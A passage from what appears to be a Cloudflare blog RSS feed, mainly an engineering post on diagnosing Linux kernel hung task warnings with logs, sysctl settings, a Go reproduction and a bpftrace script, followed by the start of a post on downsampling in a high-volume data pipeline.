  _\r\x1B[14d\x1B[1P\x1B[15d\x1B[1P\x1B[16;73H|/-=|_\r\x1B[17d\x1B[1P\x1B[8;77H=\x1B[9;73H_D _|  |\x1B[10;74H|(_)-\x1B[11;74H/     |\x1B[12;73H|      |\x1B[13;73H| _\x1B[14;73H|/ |   |\x1B[15;71H__/
  =| o |\x1B[16;72H|/-=|___|\x1B[17;1H\x1B[1P\x 1B[5;79H(@\x1B[7;77H(\r\x1B[8d\x1B[1P\x1B[9;72H_D _|  |_\x1B[10;1H\x1B[1P\x1B[11d\x1B[1P\x1B[12d\x1B[1P\x1B[13;72H| _\x1B[14;72H|/ |   |-\x1B[15;70H__/
  =| o |=\x1B[16;71H|/-=|___|=\x1B[17;1H\x1B[1P\x1B[8d\x1B[1P\x1B[9;71H_D _|  |_\r\x1B[10d\x1B[1P\x1B[11d\x1B[1P\x1B[12d\x1B[1P\x1B[13;71H| _\x1B[14;71H|/ |   |-\x1B[15;69H__/ =| o
  |=-\x1B[16;70H|/-=|___|=O\x1B[17;71H\\_/      \\\x1B[8;1H\x1B[1P\x1B[9;70H_D _|  |_\x1B[10;71H|(_)---  |\x1B[11;71H/     |  |\x1B[12;70H|      |  |\x1B[13;70H| _\x1B[80G|\x1B[14;70H|/ |
  |-\x1B[15;68H__/ =| o |=-~\x1B[16;69H|/-=|___|=\x1B[K\x1B[17;70H\\_/      \\O\x1B[8;1H\x1B[1P\x1B[9;69H_D _|  |_\r\x1B[10d\x1B[1P\x1B[11d\x1B[1P\x1B[12d\x1B[1P\x1B[13;69H| _\x1B[79G|_\x1B[14;69H|/ |
  |-\x1B[15;67H__/ =| o |=-~\r\x1B[16d\x1B[1P\x1B[17;69H\\_/      \\_\x1B[4d\b\b(@@\x1B[5;75H(    )\x1B[7;73H(@@@)\r\x1B[8d\x1B[1P\x1B[9;68H_D _|
  |_\r\x1B[10d\x1B[1P\x1B[11d\x1B[1P\x1B[12d\x1B[1P\x1B[13;68H| _\x1B[78G|_\x1B[14;68H|/ |   |-\x1B[15;66H__/ =| o |=-~~\\\x1B[16;67H|/-=|___|=   O\x1B[17;68H\\_/ \\__/\x1B[8;1H\x1B[1P\x1B[9;67H_D _|
  |_\r\x1B[10d\x1B[1P\x1B[11d\x1B[1P\x1B[12d\x1B[1P\x1B[13;67H| _\x1B[77G|_\x1B[14;67H|/ |   |-\x1B[15;65H__/ =| o |=-~O==\x1B[16;66H|/-=|___|= |\x1B[17;1H\x1B[1P\x1B[8d\x1B[1P\x1B[9;66H_D _|
  |_\x1B[10;67H|(_)---  |   H\x1B[11;67H/     |  |   H\x1B[12;66H|      |  |   H\x1B[13;66H| _\x1B[76G|___H\x1B[14;66H|/ |   |-\x1B[15;64H__/ =| o |=-O==\x1B[16;65H|/-=|___|=
  |\r\x1B[17d\x1B[1P\x1B[8d\x1B[1P\x1B[9;65H_D _|  |_\x1B[80G/\x1B[10;66H|(_)---  |   H\\\x1B[11;1H\x1B[1P\x1B[12d\x1B[1P\x1B[13;65H| _\x1B[75G|___H_\x1B[14;65H|/ | |-\x1B[15;63H__/ =| o |=-~~\\
  /\x1B[16;64H|/-=|___|=O=====O\x1B[17;65H\\_/      \\__/  \\\x1B[1;4r\x1B[4;1H\n' + '\x1B[1;24r\x1B[4;74H(    )\x1B[5;71H(@@@@)\x1B[K\x1B[7;69H(   )\x1B[K\x1B[8;68H====
  \x1B[80G_\x1B[9;1H\x1B[1P\x1B[10;65H|(_)---  |   H\\_\x1B[11;1H\x1B[1P\x1B[12d\x1B[1P\x1B[13;64H| _\x1B[74G|___H_\x1B[14;64H|/ |   |-\x1B[15;62H__/ =| o |=-~~\\  /~\x1B[16;63H|/-=|___|=
  ||\x1B[K\x1B[17;64H\\_/      \\O=====O\x1B[8;67H==== \x1B[79G_\r\x1B[9d\x1B[1P\x1B[10;64H|(_)---  |   H\\_\x1B[11;64H/     |  |   H  |\x1B[12;63H|      |  |   H  |\x1B[13;63H|
  _\x1B[73G|___H__/\x1B[14;63H|/ |   |-\x1B[15;61H__/ =| o |=-~~\\  /~\r\x1B[16d\x1B[1P\x1B[17;63H\\_/      \\_\x1B[8;66H==== \x1B[78G_\r\x1B[9d\x1B[1P\x1B[10;63H|(_)---  |
  H\\_\r\x1B[11d\x1B[1P\x1B[12;62H|      |  |   H  |_\x1B[13;62H| _\x1B[72G|___H__/_\x1B[14;62H|/ |   |-\x1B[15;60H__/ =| o |=-~~\\  /~~\\\x1B[16;61H|/-=|___|=   O=====O\x1B[17;62H\\_/      \\__/
  \\__/\x1B[8;65H==== \x1B[77G_\r\x1B[9d\x1B[1P\x1B[10;62H|(_)---  |   H\\_\r\x1B[11d\x1B[1P\x1B[12;61H|      |  |   H  |_\x1B[13;61H| _\x1B[71G|___H__/_\x1B[14;61H|/ |   |-\x1B[80GI\x1B[15;59H__/ =|
  o |=-~O=====O==\x1B[16;60H|/-=|___|=    ||    |\x1B[17;1H\x1B[1P\x1B[2;79H(@\x1B[3;74H(   )\x1B[K\x1B[4;70H(@@@@)\x1B[K\x1B[5;67H(    )\x1B[K\x1B[7;65H(@@@)\x1B[K\x1B[8;64H====
  \x1B[76G_\r\x1B[9d\x1B[1P\x1B[10;61H|(_)---  |   H\\_\x1B[11;61H/     |  |   H  |  |\x1B[12;60H|      |  |   H  |__-\x1B[13;60H| _\x1B[70G|___H__/__|\x1B[14;60H|/ |   |-\x1B[79GI_\x1B[15;58H__/ =| o
  |=-O=====O==\x1B[16;59H|/-=|___|=    ||    |\r\x1B[17d\x1B[1P\x1B[8;63H==== \x1B[75G_\r\x1B[9d\x1B[1P\x1B[10;60H|(_)---  |   H\\_\r\x1B[11d\x1B[1P\x1B[12;59H|      |  |   H  |__-\x1B[13;59H|
  _\x1B[69G|___H__/__|_\x1B[14;59H|/ |   |-\x1B[78GI_\x1B[15;57H__/ =| o |=-~~\\  /~~\\  /\x1B[16;58H|/-=|___|=O=====O=====O\x1B[17;59H\\_/      \\__/  \\__/  \\\x1B[8;62H====
  \x1B[74G_\r\x1B[9d\x1B[1P\x1B[10;59H|(_)---  |   H\\_\r\x1B  |  |   H  |__-\x1B[13;58H| _\x1B[68G|___H__/__|_\x1B[14;58H|/ |   |-\x1B[77GI_\x1B[15;56H__/ =| o |=-~~\\ /~~\\  /~\x1B[16;57H|/-=|___|=
  ||    ||\x1B[K\x1B[17;58H\\_/      \\O=====O=====O\x1B[8;61H==== \x1B[73G_\r\x1B[9d\x1B[1P\x1B[10;58H|(_)---    _\x1B[67G|___H__/__|_\x1B[14;57H|/ |   |-\x1B[76GI_\x1B[15;55H__/ =| o |=-~~\\  /~~\\
  /~\r\x1B[16d\x1B[1P\x1B[17;57H\\_/      \\_\x1B[2;75H(  ) (\x1B[3;70H(@@@)\x1B[K\x1B[4;66H()\x1B[K\x1B[5;63H(@@@@)\x1B[</code></pre>
            
    <div>
      <h2>Acknowledgements</h2>
      <a href="#acknowledgements">
        
      </a>
    </div>
    <p>Thank you to my colleagues Mengnan Gong and Shuhao Zhang, whose ideas and perspectives helped narrow down the root causes of this mystery.</p><p>If you enjoy troubleshooting weird and tricky production issues, <a href="https://www.cloudflare.com/en-gb/careers/jobs/?department=Engineering"><i><u>our engineering teams are hiring</u></i></a><i>.</i></p> ]]></content:encoded>
            <category><![CDATA[Deep Dive]]></category>
            <category><![CDATA[Linux]]></category>
            <category><![CDATA[Developer Platform]]></category>
            <category><![CDATA[Developers]]></category>
            <guid isPermaLink="false">4X0QnKvMC0yi0eRv5YqC7g</guid>
            <dc:creator>Yew Leong</dc:creator>
        </item>
        <item>
            <title><![CDATA[Searching for the cause of hung tasks in the Linux kernel]]></title>
            <link>https://blog.cloudflare.com/searching-for-the-cause-of-hung-tasks-in-the-linux-kernel/</link>
            <pubDate>Fri, 14 Feb 2025 14:00:00 GMT</pubDate>
            <description><![CDATA[ The Linux kernel can produce a hung task warning. Searching the Internet and the kernel docs, you can find a brief explanation that the process is stuck in the uninterruptible state. ]]></description>
            <content:encoded><![CDATA[ <p>Depending on your configuration, the Linux kernel can produce a hung task warning message in its log. Searching the Internet and the kernel documentation, you can find a brief explanation that the kernel process is stuck in the uninterruptable state and hasn’t been scheduled on the CPU for an unexpectedly long period of time. That explains the warning’s meaning, but doesn’t provide the reason it occurred. In this blog post we’re going to explore how the hung task warning works, why it happens, whether it is a bug in the Linux kernel or application itself, and whether it is worth monitoring at all.</p>
    <div>
      <h3>INFO: task XXX:1495882 blocked for more than YYY seconds.</h3>
      <a href="#info-task-xxx-1495882-blocked-for-more-than-yyy-seconds">
        
      </a>
    </div>
    <p>The hung task message in the kernel log looks like this:</p>
            <pre><code>INFO: task XXX:1495882 blocked for more than YYY seconds.
     Tainted: G          O       6.6.39-cloudflare-2024.7.3 #1
"echo 0 &gt; /proc/sys/kernel/hung_task_timeout_secs" disables this message.
task:XXX         state:D stack:0     pid:1495882 ppid:1      flags:0x00004002
. . .</code></pre>
            <p>Processes in Linux can be in different states. Some of them are running or ready to run on the CPU — they are in the <a href="https://elixir.bootlin.com/linux/v6.12.6/source/include/linux/sched.h#L99"><code><u>TASK_RUNNING</u></code></a> state. Others are waiting for some signal or event to happen, e.g. network packets to arrive or terminal input from a user. They are in a <code>TASK_INTERRUPTIBLE</code> state and can spend an arbitrary length of time in this state until being woken up by a signal. The most important thing about these states is that they still can receive signals, and be terminated by a signal. In contrast, a process in the <code>TASK_UNINTERRUPTIBLE</code> state is waiting only for certain special classes of events to wake them up, and can’t be interrupted by a signal. The signals are not delivered until the process emerges from this state and only a system reboot can clear the process. It’s marked with the letter <code>D</code> in the log shown above.</p><p>What if this wake up event doesn’t happen or happens with a significant delay? (A “significant delay” may be on the order of seconds or minutes, depending on the system.) Then our dependent process is hung in this state. What if this dependent process holds some lock and prevents other processes from acquiring it? Or if we see many processes in the D state? Then it might tell us that some of the system resources are overwhelmed or are not working correctly. At the same time, this state is very valuable, especially if we want to preserve the process memory. It might be useful if part of the data is written to disk and another part is still in the process memory — we don’t want inconsistent data on a disk. Or maybe we want a snapshot of the process memory when the bug is hit. To preserve this behaviour, but make it more controlled, a new state was introduced in the kernel: <a href="https://lwn.net/Articles/288056/"><code><u>TASK_KILLABLE</u></code></a> — it still protects a process, but allows termination with a fatal signal. </p>
    <div>
      <h3>How Linux identifies the hung process</h3>
      <a href="#how-linux-identifies-the-hung-process">
        
      </a>
    </div>
    <p>The Linux kernel has a special thread called <code>khungtaskd</code>. It runs regularly depending on the settings, iterating over all processes in the <code>D</code> state. If a process is in this state for more than YYY seconds, we’ll see a message in the kernel log. There are settings for this daemon that can be changed according to your wishes:</p>
            <pre><code>$ sudo sysctl -a --pattern hung
kernel.hung_task_all_cpu_backtrace = 0
kernel.hung_task_check_count = 4194304
kernel.hung_task_check_interval_secs = 0
kernel.hung_task_panic = 0
kernel.hung_task_timeout_secs = 10
kernel.hung_task_warnings = 200</code></pre>
            <p>At Cloudflare, we changed the notification threshold <code>kernel.hung_task_timeout_secs</code> from the default 120 seconds to 10 seconds. You can adjust the value for your system depending on configuration and how critical this delay is for you. If the process spends more than <code>hung_task_timeout_secs</code> seconds in the D state, a log entry is written, and our internal monitoring system emits an alert based on this log. Another important setting here is <code>kernel.hung_task_warnings</code> — the total number of messages that will be sent to the log. We limit it to 200 messages and reset it every 15 minutes. It allows us not to be overwhelmed by the same issue, and at the same time doesn’t stop our monitoring for too long. You can make it unlimited by <a href="https://docs.kernel.org/admin-guide/sysctl/kernel.html#hung-task-warnings"><u>setting the value to "-1"</u></a>.</p><p>To better understand the root causes of the hung tasks and how a system can be affected, we’re going to review more detailed examples. </p>
    <div>
      <h3>Example #1 or XFS</h3>
      <a href="#example-1-or-xfs">
        
      </a>
    </div>
    <p>Typically, there is a meaningful process or application name in the log, but sometimes you might see something like this:</p>
            <pre><code>INFO: task kworker/13:0:834409 blocked for more than 11 seconds.
 	Tainted: G      	O   	6.6.39-cloudflare-2024.7.3 #1
"echo 0 &gt; /proc/sys/kernel/hung_task_timeout_secs" disables this message.
task:kworker/13:0	state:D stack:0 	pid:834409 ppid:2   flags:0x00004000
Workqueue: xfs-sync/dm-6 xfs_log_worker</code></pre>
            <p>In this log, <code>kworker</code> is the kernel thread. It’s used as a deferring mechanism, meaning a piece of work will be scheduled to be executed in the future. Under <code>kworker</code>, the work is aggregated from different tasks, which makes it difficult to tell which application is experiencing a delay. Luckily, the <code>kworker</code> is accompanied by the <a href="https://docs.kernel.org/core-api/workqueue.html"><code><u>Workqueue</u></code></a> line. <code>Workqueue</code> is a linked list, usually predefined in the kernel, where these pieces of work are added and performed by the <code>kworker</code> in the order they were added to the queue. The <code>Workqueue</code> name <code>xfs-sync</code> and <a href="https://elixir.bootlin.com/linux/v6.12.6/source/kernel/workqueue.c#L6096"><u>the function which it points to</u></a>, <code>xfs_log_worker</code>, might give a good clue where to look. Here we can make an assumption that the <a href="https://en.wikipedia.org/wiki/XFS"><u>XFS</u></a> is under pressure and check the relevant metrics. It helped us to discover that due to some configuration changes, we forgot <code>no_read_workqueue</code> / <code>no_write_workqueue</code> flags that were introduced some time ago to <a href="https://blog.cloudflare.com/speeding-up-linux-disk-encryption/"><u>speed up Linux disk encryption</u></a>.</p><p><i>Summary</i>: In this case, nothing critical happened to the system, but the hung tasks warnings gave us an alert that our file system had slowed down.</p>
    <div>
      <h3>Example #2 or Coredump</h3>
      <a href="#example-2-or-coredump">
        
      </a>
    </div>
    <p>Let’s take a look at the next hung task log and its decoded stack trace:</p>
            <pre><code>INFO: task test:964 blocked for more than 5 seconds.
      Not tainted 6.6.72-cloudflare-2025.1.7 #1
"echo 0 &gt; /proc/sys/kernel/hung_task_timeout_secs" disables this message.
task:test            state:D stack:0     pid:964   ppid:916    flags:0x00004000
Call Trace:
&lt;TASK&gt;
__schedule (linux/kernel/sched/core.c:5378 linux/kernel/sched/core.c:6697) 
schedule (linux/arch/x86/include/asm/preempt.h:85 (discriminator 13) linux/kernel/sched/core.c:6772 (discriminator 13)) 
[do_exit (linux/kernel/exit.c:433 (discriminator 4) linux/kernel/exit.c:825 (discriminator 4)) 
? finish_task_switch.isra.0 (linux/arch/x86/include/asm/irqflags.h:42 linux/arch/x86/include/asm/irqflags.h:77 linux/kernel/sched/sched.h:1385 linux/kernel/sched/core.c:5132 linux/kernel/sched/core.c:5250) 
do_group_exit (linux/kernel/exit.c:1005) 
get_signal (linux/kernel/signal.c:2869) 
? srso_return_thunk (linux/arch/x86/lib/retpoline.S:217) 
? hrtimer_try_to_cancel.part.0 (linux/kernel/time/hrtimer.c:1347) 
arch_do_signal_or_restart (linux/arch/x86/kernel/signal.c:310) 
? srso_return_thunk (linux/arch/x86/lib/retpoline.S:217) 
? hrtimer_nanosleep (linux/kernel/time/hrtimer.c:2105) 
exit_to_user_mode_prepare (linux/kernel/entry/common.c:176 linux/kernel/entry/common.c:210) 
syscall_exit_to_user_mode (linux/arch/x86/include/asm/entry-common.h:91 linux/kernel/entry/common.c:141 linux/kernel/entry/common.c:304) 
? srso_return_thunk (linux/arch/x86/lib/retpoline.S:217) 
do_syscall_64 (linux/arch/x86/entry/common.c:88) 
entry_SYSCALL_64_after_hwframe (linux/arch/x86/entry/entry_64.S:121) 
&lt;/TASK&gt;</code></pre>
            <p>The stack trace says that the process or application <code>test</code> was blocked <code>for more than 5 seconds</code>. We might recognise this user space application by the name, but why is it blocked? It’s always helpful to check the stack trace when looking for a cause. The most interesting line here is <code>do_exit (linux/kernel/exit.c:433 (discriminator 4) linux/kernel/exit.c:825 (discriminator 4))</code>. The <a href="https://elixir.bootlin.com/linux/v6.6.67/source/kernel/exit.c#L825"><u>source code</u></a> points to the <code>coredump_task_exit</code> function. Additionally, checking the process metrics revealed that the application crashed during the time when the warning message appeared in the log. When a process is terminated based on some set of signals (abnormally), <a href="https://man7.org/linux/man-pages/man5/core.5.html"><u>the Linux kernel can provide a core dump file</u></a>, if enabled. The mechanism — when a process terminates, the kernel makes a snapshot of the process memory before exiting and either writes it to a file or sends it through the socket to another handler — can be <a href="https://systemd.io/COREDUMP/"><u>systemd-coredump</u></a> or your custom one. When it happens, the kernel moves the process to the <code>D</code> state to preserve its memory and early termination. The higher the process memory usage, the longer it takes to get a core dump file, and the higher the chance of getting a hung task warning.</p><p>Let’s check our hypothesis by triggering it with a small Go program. We’ll use the default Linux coredump handler and will decrease the hung task threshold to 1 second.</p><p>Coredump settings:</p>
            <pre><code>$ sudo sysctl -a --pattern kernel.core
kernel.core_pattern = core
kernel.core_pipe_limit = 16
kernel.core_uses_pid = 1</code></pre>
            <p>You can make changes with <a href="https://man7.org/linux/man-pages/man8/sysctl.8.html"><u>sysctl</u></a>:</p>
            <pre><code>$ sudo sysctl -w kernel.core_uses_pid=1</code></pre>
            <p>Hung task settings:</p>
            <pre><code>$ sudo sysctl -a --pattern hung
kernel.hung_task_all_cpu_backtrace = 0
kernel.hung_task_check_count = 4194304
kernel.hung_task_check_interval_secs = 0
kernel.hung_task_panic = 0
kernel.hung_task_timeout_secs = 1
kernel.hung_task_warnings = -1</code></pre>
            <p>Go program:</p>
            <pre><code>$ cat main.go
package main

import (
	"os"
	"time"
)

func main() {
	_, err := os.ReadFile("test.file")
	if err != nil {
		panic(err)
	}
	time.Sleep(8 * time.Minute) 
}</code></pre>
            <p>This program reads a 10 GB file into process memory. Let’s create the file:</p>
            <pre><code>$ yes this is 10GB file | head -c 10GB &gt; test.file</code></pre>
            <p>The last step is to build the Go program, crash it, and watch our kernel log:</p>
            <pre><code>$ go mod init test
$ go build .
$ GOTRACEBACK=crash ./test
$ (Ctrl+\)</code></pre>
            <p>Hooray! We can see our hung task warning:</p>
            <pre><code>$ sudo dmesg -T | tail -n 31
INFO: task test:8734 blocked for more than 22 seconds.
      Not tainted 6.6.72-cloudflare-2025.1.7 #1
      Blocked by coredump.
"echo 0 &gt; /proc/sys/kernel/hung_task_timeout_secs" disables this message.
task:test            state:D stack:0     pid:8734  ppid:8406   task_flags:0x400448 flags:0x00004000</code></pre>
            <p>By the way, have you noticed the <code>Blocked by coredump.</code> line in the log? It was recently added to the <a href="https://git.kernel.org/pub/scm/linux/kernel/git/akpm/mm.git/commit/?h=mm-nonmm-stable&amp;id=23f3f7625cfb55f92e950950e70899312f54afb7"><u>upstream</u></a> code to improve visibility and remove the blame from the process itself. The patch also added the <code>task_flags</code> information, as <code>Blocked by coredump</code> is detected via the flag <a href="https://elixir.bootlin.com/linux/v6.13.1/source/include/linux/sched.h#L1675"><code><u>PF_POSTCOREDUMP</u></code></a>, and knowing all the task flags is useful for further root-cause analysis.</p><p><i>Summary</i>: This example showed that even if everything suggests that the application is the problem, the real root cause can be something else — in this case, <code>coredump</code>.</p>
    <div>
      <h3>Example #3 or rtnl_mutex</h3>
      <a href="#example-3-or-rtnl_mutex">
        
      </a>
    </div>
    <p>This one was tricky to debug. Usually, the alerts are limited by one or two different processes, meaning only a certain application or subsystem experiences an issue. In this case, we saw dozens of unrelated tasks hanging for minutes with no improvements over time. Nothing else was in the log, most of the system metrics were fine, and existing traffic was being served, but it was not possible to ssh to the server. New Kubernetes container creations were also stalling. Analyzing the stack traces of different tasks initially revealed that all the traces were limited to just three functions:</p>
            <pre><code>rtnetlink_rcv_msg+0x9/0x3c0
dev_ethtool+0xc6/0x2db0 
bonding_show_bonds+0x20/0xb0</code></pre>
            <p>Further investigation showed that all of these functions were waiting for <a href="https://elixir.bootlin.com/linux/v6.6.74/source/net/core/rtnetlink.c#L76"><code><u>rtnl_lock</u></code></a> to be acquired. It looked like some application acquired the <code>rtnl_mutex</code> and didn’t release it. All other processes were in the <code>D</code> state waiting for this lock.</p><p>The RTNL lock is primarily used by the kernel networking subsystem for any network-related config, for both writing and reading. The RTNL is a global <b>mutex</b> lock, although <a href="https://lpc.events/event/18/contributions/1959/"><u>upstream efforts</u></a> are being made for splitting up RTNL per network namespace (netns).</p><p>From the hung task reports, we can observe the “victims” that are being stalled waiting for the lock, but how do we identify the task that is holding this lock for too long? For troubleshooting this, we leveraged <code>BPF</code> via a <code>bpftrace</code> script, as this allows us to inspect the running kernel state. The <a href="https://elixir.bootlin.com/linux/v6.6.75/source/include/linux/mutex.h#L67"><u>kernel's mutex implementation</u></a> has a struct member called <code>owner</code>. It contains a pointer to the <a href="https://elixir.bootlin.com/linux/v6.6.75/source/include/linux/sched.h#L746"><code><u>task_struct</u></code></a> from the mutex-owning process, except it is encoded as type <code>atomic_long_t</code>. This is because the mutex implementation stores some state information in the lower 3-bits (mask 0x7) of this pointer. Thus, to read and dereference this <code>task_struct</code> pointer, we must first mask off the lower bits (0x7).</p><p>Our <code>bpftrace</code> script to determine who holds the mutex is as follows:</p>
            <pre><code>#!/usr/bin/env bpftrace
interval:s:10 {
  $rtnl_mutex = (struct mutex *) kaddr("rtnl_mutex");
  $owner = (struct task_struct *) ($rtnl_mutex-&gt;owner.counter &amp; ~0x07);
  if ($owner != 0) {
    printf("rtnl_mutex-&gt;owner = %u %s\n", $owner-&gt;pid, $owner-&gt;comm);
  }
}</code></pre>
            <p>In this script, the <code>rtnl_mutex</code> lock is a global lock whose address can be exposed via <code>/proc/kallsyms</code> – using <code>bpftrace</code> helper function <code>kaddr()</code>, we can access the struct mutex pointer from the <code>kallsyms</code>. Thus, we can periodically (via <code>interval:s:10</code>) check if someone is holding this lock.</p><p>In the output we had this:</p>
            <pre><code>rtnl_mutex-&gt;owner = 3895365 calico-node</code></pre>
            <p>This allowed us to quickly identify <code>calico-node</code> as the process holding the RTNL lock for too long. To quickly observe where this process itself is stalled, the call stack is available via <code>/proc/3895365/stack</code>. This showed us that the root cause was a Wireguard config change, with function <code>wg_set_device()</code> holding the RTNL lock, and <code>peer_remove_after_dead()</code> waiting too long for a <code>napi_disable()</code> call. We continued debugging via a tool called <a href="https://drgn.readthedocs.io/en/latest/user_guide.html#stack-traces"><code><u>drgn</u></code></a>, which is a programmable debugger that can debug a running kernel via a Python-like interactive shell. We still haven’t discovered the root cause for the Wireguard issue and have <a href="https://lore.kernel.org/lkml/CALrw=nGoSW=M-SApcvkP4cfYwWRj=z7WonKi6fEksWjMZTs81A@mail.gmail.com/"><u>asked the upstream</u></a> for help, but that is another story.</p><p><i>Summary</i>: The hung task messages were the only ones which we had in the kernel log. Each stack trace of these messages was unique, but by carefully analyzing them, we could spot similarities and continue debugging with other instruments.</p>
    <div>
      <h3>Epilogue</h3>
      <a href="#epilogue">
        
      </a>
    </div>
    <p>Your system might have different hung task warnings, and we have many others not mentioned here. Each case is unique, and there is no standard approach to debug them. But hopefully this blog post helps you better understand why it’s good to have these warnings enabled, how they work, and what the meaning is behind them. We tried to provide some navigation guidance for the debugging process as well:</p><ul><li><p>analyzing the stack trace might be a good starting point for debugging it, even if all the messages look unrelated, like we saw in example #3</p></li><li><p>keep in mind that the alert might be misleading, pointing to the victim and not the offender, as we saw in example #2 and example #3</p></li><li><p>if the kernel doesn’t schedule your application on the CPU, puts it in the D state, and emits the warning – the real problem might exist in the application code</p></li></ul><p>Good luck with your debugging, and hopefully this material will help you on this journey!</p> ]]></content:encoded>
            <category><![CDATA[Deep Dive]]></category>
            <category><![CDATA[Linux]]></category>
            <category><![CDATA[Kernel]]></category>
            <category><![CDATA[Monitoring]]></category>
            <guid isPermaLink="false">3UHNgpNPKn2IAwDUzD4m3a</guid>
            <dc:creator>Oxana Kharitonova</dc:creator>
            <dc:creator>Jesper Brouer</dc:creator>
        </item>
        <item>
            <title><![CDATA[Over 700 million events/second: How we make sense of too much data]]></title>
            <link>https://blog.cloudflare.com/how-we-make-sense-of-too-much-data/</link>
            <pubDate>Mon, 27 Jan 2025 14:00:00 GMT</pubDate>
            <description><![CDATA[ Here we explain how we made our data pipeline scale to 700 million events per second while becoming more resilient than ever before. We share some math behind our approach and some of the designs of  ]]></description>
            <content:encoded><![CDATA[ <p>Cloudflare's network provides an enormous array of services to our customers. We collect and deliver associated data to customers in the form of event logs and aggregated analytics. As of December 2024, our data pipeline is ingesting up to 706M events per second generated by Cloudflare's services, and that represents 100x growth since our <a href="https://blog.cloudflare.com/http-analytics-for-6m-requests-per-second-using-clickhouse/"><u>2018 data pipeline blog post</u></a>. </p><p>At peak, we are moving 107 <a href="https://simple.wikipedia.org/wiki/Gibibyte"><u>GiB</u></a>/s of compressed data, either pushing it directly to customers or subjecting it to additional queueing and batching.</p><p>All of these data streams power things like <a href="https://developers.cloudflare.com/logs/"><u>Logs</u></a>, <a href="https://developers.cloudflare.com/analytics/"><u>Analytics</u></a>, and billing, as well as other products, such as training machine learning models for bot detection. This blog post is focused on techniques we use to efficiently and accurately deal with the high volume of data we ingest for our Analytics products. A previous <a href="https://blog.cloudflare.com/cloudflare-incident-on-november-14-2024-resulting-in-lost-logs/"><u>blog post</u></a> provides a deeper dive into the data pipeline for Logs. </p><p>The pipeline can be roughly described by the following diagram.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/5ihv6JXx19nJiEyfCaCg8V/ad7081720514bafd070cc38a04bc7097/BLOG-2486_2.jpg" />
          </figure><p>The data pipeline has multiple stages, and each can and will naturally break or slow down because of hardware failures or misconfiguration. And when that happens, there is just too much data to be able to buffer it all for very long. Eventually some will get dropped, causing gaps in analytics and a degraded product experience unless proper mitigations are in place.</p>
    <div>
      <h3>Dropping data to retain information</h3>
      <a href="#dropping-data-to-retain-information">
        
      </a>
    </div>
    <p>How does one retain valuable information from more than half a billion events per second, when some must be dropped? Drop it in a controlled way, by downsampling.</p><p>Here is a visual analogy showing the difference between uncontrolled data loss and downsampling. In both cases the same number of pixels were delivered. One is a higher resolution view of just a small portion of a popular painting, while the other shows the full painting, albeit blurry and highly pixelated.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/4kUGB4RLQzFb7cphMpHqAg/e7ccf871c73e0e8ca9dcac32fe265f18/Screenshot_2025-01-24_at_10.57.17_AM.png" />
          </figure><p>As we noted above, any point in the pipeline can fail, so we want the ability to downsample at any point as needed. Some services proactively downsample data at the source before it even hits Logfwdr. This makes the information extracted from that data a little bit blurry, but much more useful than what otherwise would be delivered: random chunks of the original with gaps in between, or even nothing at all. The amount of "blur" is outside our control (we make our best effort to deliver full data), but there is a robust way to estimate it, as discussed in the <a href="/how-we-make-sense-of-too-much-data/#extracting-value-from-downsampled-data"><u>next section</u></a>.</p><p>Logfwdr can decide to downsample data sitting in the buffer when it overflows. Logfwdr handles many data streams at once, so we need to prioritize them by assigning each data stream a weight and then applying <a href="https://en.wikipedia.org/wiki/Max-min_fairness"><u>max-min fairness</u></a> to better utilize the buffer. It allows each data stream to store as much as it needs, as long as the whole buffer is not saturated. Once it is saturated, streams divide it fairly according to their weighted size.</p><p>In our implementation (Go), each data stream is driven by a goroutine, and they cooperate via channels. They consult a single tracker object every time they allocate and deallocate memory. The tracker uses a <a href="https://en.wikipedia.org/wiki/Heap_(data_structure)"><u>max-heap</u></a> to always know who the heaviest participant is and what the total usage is. Whenever the total usage goes over the limit, the tracker repeatedly sends the "please shed some load" signal to the heaviest participant, until the usage is again under the limit.</p><p>The effect of this is that healthy streams, which buffer a tiny amount, allocate whatever they need without losses. But any lagging streams split the remaining memory allowance fairly.</p><p>We downsample more or less uniformly, by always taking some of the least downsampled batches from the buffer (using min-heap to find those) and merging them together upon downsampling.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/15VP0VYkrvkQboX9hrOy0q/e3d087fe704bd1b0ee41eb5b7a24b899/BLOG-2486_4.png" />
          </figure><p><sup><i>Merging keeps the batches roughly the same size and their number under control.</i></sup></p><p>Downsampling is cheap, but since data in the buffer is compressed, it causes recompression, which is the single most expensive thing we do to the data. But using extra CPU time is the last thing you want to do when the system is under heavy load! We compensate for the recompression costs by starting to downsample the fresh data as well (before it gets compressed for the first time) whenever the stream is in the "shed the load" state.</p><p>We called this approach "bottomless buffers", because you can squeeze effectively infinite amounts of data in there, and it will just automatically be thinned out. Bottomless buffers resemble <a href="https://en.wikipedia.org/wiki/Reservoir_sampling"><u>reservoir sampling</u></a>, where the buffer is the reservoir and the population comes as the input stream. But there are some differences. First is that in our pipeline the input stream of data never ends, while reservoir sampling assumes it ends to finalize the sample. Secondly, the resulting sample also never ends.</p><p>Let's look at the next stage in the pipeline: Logreceiver. It sits in front of a distributed queue. The purpose of logreceiver is to partition each stream of data by a key that makes it easier for Logpush, Analytics inserters, or some other process to consume.</p><p>Logreceiver proactively performs adaptive sampling of analytics. This improves the accuracy of analytics for small customers (receiving on the order of 10 events per day), while more aggressively downsampling large customers (millions of events per second). Logreceiver then pushes the same data at multiple resolutions (100%, 10%, 1%, etc.) into different topics in the distributed queue. This allows it to keep pushing something rather than nothing when the queue is overloaded, by just skipping writing the high-resolution samples of data.</p><p>The same goes for Inserters: they can skip <i>reading or writing</i> high-resolution data. The Analytics APIs can skip <i>reading</i> high resolution data. The analytical database might be unable to read high resolution data because of overload or degraded cluster state or because there is just too much to read (very wide time range or very large customer). Adaptively dropping to lower resolutions allows the APIs to return <i>some</i> results in all of those cases.</p>
    <div>
      <h3>Extracting value from downsampled data</h3>
      <a href="#extracting-value-from-downsampled-data">
        
      </a>
    </div>
